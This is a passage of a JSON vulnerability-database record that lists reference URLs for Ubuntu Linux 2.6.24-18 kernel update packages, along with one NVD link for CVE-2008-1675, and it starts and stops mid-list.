        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-386-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-server_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-powerpc-di_2.6.24.13-18.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-rt_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc-smp_2.6.24-18.26_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-rt_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-xen_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-sparc64-smp_2.6.24-18.16_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy-dev_71.86.04+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-18.32_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-rt_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-lpiacompat_2.6.24-18.26_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-server_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-rt_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18_2.6.24-18.32_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-legacy-kernel-source_71.86.04+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-control_8-3+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-powerpc-di_2.6.24-18.16_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-generic_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-18.32_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-generic_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc64-smp_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24_2.6.24-18.16.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-sparc64-smp_2.6.24-18.16_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-powerpc-smp_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc64-smp_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy_71.86.04+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-openvz_2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-386-di_2.6.24-18.26_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-server_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-powerpc-smp_2.6.24-18.32_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-sparc64-smp_2.6.24-18.26_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-powerpc_2.6.24.13-18.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx_96.43.05+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-common_2.6.24.13-18.41_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx_7.1.0-8-3+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13-18.41.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new-dev_169.12+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-xen_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-server_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-generic_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1675"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-firmware-2.6.24-18_3.11+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-dev_96.43.05+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-xen_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy_71.86.04+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-server_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24_2.6.24.13-18.41.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-rt_2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-rt_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-generic-di_2.6.24.13-18.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-server_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc-smp_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-generic-di_2.6.24-18.16_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-lpia_2.6.24-18.16_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-386_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-generic_2.6.24-18.26_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-18.32_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-sparc64-di_2.6.24-18.26_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-new-kernel-source_169.12+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-sparc64_2.6.24-18.16_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx_96.43.05+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-generic_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-18-sparc64-di_2.6.24-18.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-rt_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-control_8-3+2.6.24.13-18.41_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc-smp_2.6.24-18.16_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-openvz_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new-dev_169.12+2.6.24.13-18.41_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-server_2.6.24-18.26_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-generic_2.6.24-18.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-18-server_2.6.24-18.32_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-sparc64_2.6.24-18.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-sparc64-smp_2.6.24.13-18.41_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-sparc64-smp_2.6.24-18.32_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-virtual_2.6.24-18.16_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-18-generic-di_2.6.24-18.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-virtual_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-18-virtual_2.6.24-18.32_i386.deb"
      },
      {
        "trust": 0.1,
